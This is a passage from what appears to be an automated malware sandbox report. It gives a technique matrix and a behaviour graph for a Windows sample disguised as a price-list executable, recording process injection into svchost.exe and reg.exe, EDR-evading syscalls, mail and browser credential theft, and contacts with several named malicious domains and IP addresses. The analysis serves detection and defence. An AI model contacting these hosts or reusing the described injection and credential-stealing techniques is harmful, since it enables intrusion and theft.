                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633359 Sample: F#U0130YAT #U0130STE#U011e#... Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 28 www.tgwfj.xyz 2->28 30 www.nodefolio.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 uD8F5JGUDvEpNoCYQYtn.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 reg.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 uD8F5JGUDvEpNoCYQYtn.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.maxank.top 162.254.32.77, 49701, 49702, 49703 VIVIDHOSTINGUS United States 22->34 36 www.super-mist.store 103.224.182.242, 49749, 49750, 49751 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.